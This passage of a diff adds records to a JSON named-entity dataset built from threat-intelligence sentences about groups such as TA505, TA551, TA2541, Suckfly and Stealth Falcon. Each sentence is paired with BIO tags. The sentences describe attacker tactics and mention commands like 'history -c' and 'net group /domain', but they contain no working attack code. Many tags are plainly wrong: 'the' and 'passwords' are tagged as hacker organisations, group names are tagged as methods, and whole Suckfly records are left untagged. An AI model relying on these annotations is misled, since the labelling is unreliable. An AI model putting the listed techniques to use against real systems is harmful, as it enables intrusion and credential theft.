+ "the", + "system", + "directory,", + "build", + "number,", + "serial", + "number,", + "version,", + "manufacturer,", + "model,", + "and", + "total", + "physical", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "the", + "Address", + "Resolution", + "Protocol", + "(ARP)", + "table", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "the", + "registered", + "user", + "and", + "primary", + "owner", + "name", + "via", + "WMI." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "B-Tool", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "communicates", + "with", + "its", + "C2", + "server", + "via", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "passwords", + "from", + "the", + "Windows", + "Credential", + "Vault." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Tool", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "system", + "information", + "via", + "Windows", + "Management", + "Instrumentation", + "(WMI)." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Strider", + "has", + "used", + "a", + "hidden", + "file", + "system", + "that", + "is", + "stored", + "as", + "a", + "file", + "on", + "disk." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Strider", + "has", + "used", + "local", + "servers", + "with", + "both", + "local", + "network", + "and", + "Internet", + "access", + "to", + "act", + "as", + "internal", + "proxy", + "nodes", + "to", + "exfiltrate", + "data", + "from", + "other", + "parts", + "of", + "the", + "network", + "without", + "direct", + "Internet", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Strider", + "has", + "registered", + "its", + "persistence", + "module", + "on", + "domain", + "controllers", + "as", + "a", + "Windows", + "LSA", + "(Local", + "System", + "Authority)", + "password", + "filter", + "to", + "acquire", + "credentials", + "any", + "time", + "a", + "domain,", + "local", + "user,", + "or", + "administrator", + "logs", + "in", + "or", + "changes", + "a", + "password." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Suckfly", + "has", + "used", + "stolen", + "certificates", + "to", + "sign", + "its", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Suckfly", + "the", + "victim's", + "internal", + "network", + "for", + "hosts", + "with", + "ports", + "8080,", + "5900,", + "and", + "40", + "open." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Suckfly", + "used", + "a", + "signed", + "credential-dumping", + "tool", + "to", + "obtain", + "victim", + "account", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Suckfly", + "used", + "legitimate", + "account", + "credentials", + "that", + "they", + "dumped", + "to", + "navigate", + "the", + "internal", + "victim", + "network", + "as", + "though", + "they", + "were", + "the", + "legitimate", + "account", + "owner." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "tools", + "used", + "by", + "Suckfly", + "have", + "been", + "command-line", + "driven." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "TLS", + "encrypted", + "C2", + "communications", + "including", + "for", + "campaigns", + "using", + "AsyncRAT." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "attempted", + "to", + "disable", + "built-in", + "security", + "protections", + "such", + "as", + "Windows", + "AMSI." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "registered", + "domains", + "often", + "containing", + "the", + "keywords", + "“kimjoy,”", + "“h0pe,”", + "and", + "“grace,”", + "using", + "domain", + "registrars", + "including", + "Netdorm", + "and", + "No-IP", + "DDNS,", + "and", + "hosting", + "providers", + "including", + "xTom", + "GmbH", + "and", + "Danilenko,", + "Artyom." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Org", + "O", + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "dynamic", + "DNS", + "services", + "for", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "compressed", + "and", + "char-encoded", + "scripts", + "in", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "malicious", + "scripts", + "and", + "macros", + "with", + "the", + "ability", + "to", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "run", + "scripts", + "to", + "check", + "internet", + "connectivity", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "macro-enabled", + "MS", + "Word", + "documents", + "to", + "lure", + "victims", + "into", + "executing", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "malicious", + "links", + "to", + "cloud", + "and", + "web", + "services", + "to", + "gain", + "execution", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "multiple", + "strains", + "of", + "malware", + "available", + "for", + "purchase", + "on", + "criminal", + "forums", + "or", + "in", + "open-source", + "repositories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "file", + "names", + "to", + "mimic", + "legitimate", + "Windows", + "files", + "or", + "system", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "`mshta`", + "to", + "execute", + "scripts", + "including", + "VBS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "PowerShell", + "to", + "download", + "files", + "and", + "to", + "inject", + "into", + "various", + "Windows", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "process", + "hollowing", + "to", + "execute", + "CyberGate", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "injected", + "malicious", + "code", + "into", + "legitimate", + ".NET", + "related", + "processes", + "including", + "regsvcs.exe,", + "msbuild.exe,", + "and", + "installutil.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "placed", + "VBS", + "files", + "in", + "the", + "Startup", + "folder", + "and", + "used", + "Registry", + "run", + "keys", + "to", + "establish", + "persistence", + "for", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "scheduled", + "tasks", + "to", + "establish", + "persistence", + "for", + "installed", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "tools", + "to", + "search", + "victim", + "systems", + "for", + "security", + "products", + "such", + "as", + "antivirus", + "and", + "firewall", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "a", + ".NET", + "packer", + "to", + "obfuscate", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "sent", + "phishing", + "emails", + "with", + "malicious", + "attachments", + "for", + "initial", + "access", + "including", + "MS", + "Word", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "spearphishing", + "e-mails", + "with", + "malicious", + "links", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "collected", + "system", + "information", + "prior", + "to", + "downloading", + "malware", + "on", + "the", + "targeted", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "commodity", + "remote", + "access", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "uploaded", + "malware", + "to", + "various", + "platforms", + "including", + "Google", + "Drive,", + "Pastetext,", + "Sharetext,", + "and", + "GitHub." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "VBS", + "files", + "to", + "execute", + "or", + "establish", + "persistence", + "for", + "additional", + "payloads,", + "often", + "using", + "file", + "names", + "consistent", + "with", + "email", + "themes", + "or", + "mimicking", + "system", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "hosted", + "malicious", + "files", + "on", + "various", + "platforms", + "including", + "Google", + "Drive,", + "OneDrive,", + "Discord,", + "PasteText,", + "ShareText,", + "and", + "GitHub." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TA2541", + "has", + "used", + "WMI", + "to", + "query", + "targeted", + "systems", + "for", + "security", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA459", + "has", + "exploited", + "Microsoft", + "Word", + "vulnerability", + "CVE-2017-0199", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "TA459", + "has", + "attempted", + "to", + "get", + "victims", + "to", + "open", + "malicious", + "Microsoft", + "Word", + "attachment", + "sent", + "via", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TA459", + "has", + "used", + "PowerShell", + "for", + "execution", + "of", + "a", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA459", + "has", + "targeted", + "victims", + "using", + "spearphishing", + "emails", + "with", + "malicious", + "Microsoft", + "Word", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "TA459", + "has", + "a", + "VBScript", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "signed", + "payloads", + "with", + "code", + "signing", + "certificates", + "from", + "Thawte", + "and", + "Sectigo." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "base64", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "malware", + "to", + "gather", + "credentials", + "from", + "FTP", + "clients", + "and", + "Outlook." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "malware", + "to", + "gather", + "credentials", + "from", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "a", + "wide", + "variety", + "of", + "ransomware,", + "such", + "as", + "Clop,", + "Locky,", + "Jaff,", + "Bart,", + "Philadelphia,", + "and", + "GlobeImposter,", + "to", + "encrypt", + "victim", + "files", + "and", + "demand", + "a", + "ransom", + "payment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Tool", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "decrypted", + "packed", + "DLLs", + "with", + "an", + "XOR", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "malware", + "to", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "stolen", + "domain", + "admin", + "accounts", + "to", + "compromise", + "additional", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "registered", + "domains", + "to", + "impersonate", + "services", + "such", + "as", + "Dropbox", + "to", + "distribute", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "leveraged", + "malicious", + "Word", + "documents", + "that", + "abused", + "DDE." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "been", + "seen", + "injecting", + "a", + "DLL", + "into", + "winword.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "the", + "tool", + "EmailStealer", + "to", + "steal", + "and", + "send", + "lists", + "of", + "e-mail", + "addresses", + "to", + "a", + "remote", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "password-protected", + "malicious", + "Word", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "fast", + "flux", + "to", + "mask", + "botnets", + "by", + "distributing", + "payloads", + "across", + "multiple", + "IPs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "downloaded", + "additional", + "malware", + "to", + "execute", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "JavaScript", + "for", + "code", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "lures", + "to", + "get", + "users", + "to", + "enable", + "content", + "in", + "malicious", + "attachments", + "and", + "execute", + "malicious", + "files", + "contained", + "in", + "archives.", + "For", + "example,", + "TA505", + "makes", + "their", + "malware", + "look", + "like", + "legitimate", + "Microsoft", + "Word", + "documents,", + ".pdf", + "and/or", + ".lnk", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "lures", + "to", + "get", + "users", + "to", + "click", + "links", + "in", + "emails", + "and", + "attachments.", + "For", + "example,", + "TA505", + "makes", + "their", + "malware", + "look", + "like", + "legitimate", + "Microsoft", + "Word", + "documents,", + ".pdf", + "and/or", + ".lnk", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "malware", + "such", + "as", + "Azorult", + "and", + "Cobalt", + "Strike", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + ".iso", + "files", + "to", + "deploy", + "malicious", + ".lnk", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "malware", + "to", + "disable", + "Windows", + "Defender", + "through", + "modification", + "of", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "<code>msiexec</code>", + "to", + "download", + "and", + "execute", + "malicious", + "Windows", + "Installer", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "deployed", + "payloads", + "that", + "use", + "Windows", + "API", + "calls", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "TinyMet", + "to", + "enumerate", + "members", + "of", + "privileged", + "groups.", + "TA505", + "has", + "also", + "run", + "<code>net", + "group", + "/domain</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "PowerShell", + "to", + "download", + "and", + "execute", + "malware", + "and", + "reconnaissance", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "leveraged", + "<code>rundll32.exe</code>", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "UPX", + "to", + "obscure", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "spearphishing", + "emails", + "with", + "malicious", + "attachments", + "to", + "initially", + "compromise", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "a", + "variety", + "of", + "tools", + "in", + "their", + "operations,", + "including", + "AdFind,", + "BloodHound,", + "Mimikatz,", + "and", + "PowerSploit." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TA505", + "has", + "staged", + "malware", + "on", + "actor-controlled", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "VBS", + "for", + "code", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "used", + "HTTP", + "to", + "communicate", + "with", + "C2", + "nodes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA505", + "has", + "executed", + "commands", + "using", + "<code>cmd.exe</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "obfuscated", + "variable", + "names", + "in", + "a", + "JavaScript", + "configuration", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "a", + "DGA", + "to", + "generate", + "URLs", + "from", + "executed", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "spoofed", + "company", + "emails", + "that", + "were", + "acquired", + "from", + "email", + "clients", + "on", + "previously", + "infected", + "hosts", + "to", + "target", + "other", + "individuals." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "retrieved", + "DLLs", + "and", + "installer", + "binaries", + "for", + "malware", + "execution", + "from", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "prompted", + "users", + "to", + "enable", + "macros", + "within", + "spearphishing", + "attachments", + "to", + "install", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "masked", + "malware", + "DLLs", + "as", + "dat", + "and", + "jpg", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "mshta.exe", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "regsvr32.exe", + "to", + "load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "rundll32.exe", + "to", + "load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "sent", + "spearphishing", + "attachments", + "with", + "password", + "protected", + "ZIP", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "encoded", + "ASCII", + "text", + "for", + "initial", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "hidden", + "encoded", + "data", + "for", + "malware", + "DLLs", + "in", + "a", + "PNG." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TA551", + "has", + "used", + "<code>cmd.exe</code>", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "an", + "IRC", + "bot", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "cleared", + "command", + "history", + "with", + "<code>history", + "-c</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + 